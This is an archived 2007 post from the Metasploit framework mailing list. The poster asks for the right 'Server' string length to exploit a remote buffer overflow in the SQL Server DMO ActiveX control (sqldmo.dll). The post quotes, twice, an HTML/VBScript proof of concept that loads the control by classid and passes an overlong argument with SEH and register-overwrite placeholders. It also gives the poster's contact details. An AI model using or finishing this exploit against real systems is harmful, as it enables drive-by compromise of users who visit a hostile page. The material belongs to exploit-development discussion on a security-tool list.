Metasploit mailing list archives
Microsoft SQL Server Distributed Management Objects OLE DLL for
From: manish.gupta at ariosesoftware.com (Manish Gupta)
Date: Fri, 14 Sep 2007 09:11:53 +0530
Hi I want to know the server string length of Microsoft SQL Server Distributed Management Objects OLE DLL which has been published on 7th of Sept. 2007 . Regards Manish Gupta Ariose Software Noida (U.P) Mbl:-+91-9891650667 _____ From: Manish Gupta [mailto:manish.gupta at ariosesoftware.com] Sent: Thursday, September 13, 2007 6:05 PM To: framework at metasploit.com Subject: [framework] Microsoft SQL Server Distributed Management Objects OLE DLL for Hi Am working on "Microsoft SQL Server Distributed Management Objects OLE DLL for SQL Enterprise Manager (sqldmo.dll) remote buffer overflow" on this vulnerability whose exploit is <html> <object classid='clsid:10020200-E260-11CF-AE68-00AA004A34D5' id='SQLServer' /></object> <script language='vbscript'> targetFile = "C:\Programmi\Microsoft SQL Server\80\Tools\Binn\sqldmo.dll" prototype = "Sub Start ( ByVal StartMode As Boolean , [ ByVal Server As Variant ] , [ ByVal Login As Variant ] , [ ByVal Password As Variant ] )" memberName = "Start" progid = "SQLDMO.SQLServer" argCount = 4 'edx = ecx edx ="bb" seh ="aa" StartMode =True Server ="http://ZZZZ\YYYY\XXXX\WW?W\VVVV\AAAA\AAA\AAAAA\AAAA\AA at AA\tes\test\test\te s.\ttest\MMMM\LLLL\KKK\JJJJ\IIII\HH.H\GGGGG\FFFF\EEEE\DDD\CCCC\BBBB\AAA\A\\\ \\\\\\:#$%AAAA\BBBB\CCCC\DD?D\EEEE\FFFF\GGG\\:#$%\HHHHH\IIII\te at st\tes\test\ test\tes.aaaabbbbccccddddeeeeffffgggghhhhiiiiaaaaaaa" + seh + "CCDmmm" + edx + "nnnBBBB\AAAA\ZZZ\Z\\\\\\\\\:#$%YYYY\XXXX\WWWW\VV?V\UUUU\TTTT\SSS\\:#$%\RRRR R\QQQQ\PP at PP\OOO\NNNN\MMMM\LLL.\KKKKK\JJJJ\IIII\HHH\GGGG\FFFF\EE.E\DDDDD\CCC C\BBBB\AAA\AAAA\AAAA\AAA\A\\\\\\\\\:#$%AAAA\AAAA\AAAA\AA?A\wwww\vvvv\uuu\\:# $%\ttttt\ssss\rr at rr\qqq\pppp\oooo\nnn.\mmmmm\llll\kkkk\jjj\iiii\hhhh\gg.g\ff fff\eeee\dddd\ccc\bbbb\aaaa\AAA\A\\\\\\\" Login ="aaaaaaaa" Password ="bbbbbbbb" SQLServer.Start StartMode ,Server ,Login ,Password </script> </html> I am not able to find the server length so please help me. Server ="http://ZZZZ\YYYY\XXXX\WW?W\VVVV\AAAA\AAA\AAAAA\AAAA\AA at AA\tes\test\test\te s.\ttest\MMMM\LLLL\KKK\JJJJ\IIII\HH.H\GGGGG\FFFF\EEEE\DDD\CCCC\BBBB\AAA\A\\\ \\\\\\:#$%AAAA\BBBB\CCCC\DD?D\EEEE\FFFF\GGG\\:#$%\HHHHH\IIII\te at st\tes\test\ test\tes.aaaabbbbccccddddeeeeffffgggghhhhiiiiaaaaaaa" + seh + "CCDmmm" + edx + "nnnBBBB\AAAA\ZZZ\Z\\\\\\\\\:#$%YYYY\XXXX\WWWW\VV?V\UUUU\TTTT\SSS\\:#$%\RRRR R\QQQQ\PP at PP\OOO\NNNN\MMMM\LLL.\KKKKK\JJJJ\IIII\HHH\GGGG\FFFF\EE.E\DDDDD\CCC C\BBBB\AAA\AAAA\AAAA\AAA\A\\\\\\\\\:#$%AAAA\AAAA\AAAA\AA?A\wwww\vvvv\uuu\\:# $%\ttttt\ssss\rr at rr\qqq\pppp\oooo\nnn.\mmmmm\llll\kkkk\jjj\iiii\hhhh\gg.g\ff fff\eeee\dddd\ccc\bbbb\aaaa\AAA\A\\\\\\\" \\ Regards Manish Gupta Ariose Software Noida (U.P) Mbl:-+91-9891650667 -------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20070914/7a5d9277/attachment.htm>
Current thread:
- Microsoft SQL Server Distributed Management Objects OLE DLL for Manish Gupta (Sep 13)
- <Possible follow-ups>
- Microsoft SQL Server Distributed Management Objects OLE DLL for Manish Gupta (Sep 13)
- Microsoft SQL Server Distributed Management Objects OLE DLL for Rhys Kidd (Sep 13)
- Microsoft SQL Server Distributed Management Objects OLE DLL for Manish Gupta (Sep 13)
- Microsoft SQL Server Distributed Management Objects OLE DLL for Manish Gupta (Sep 13)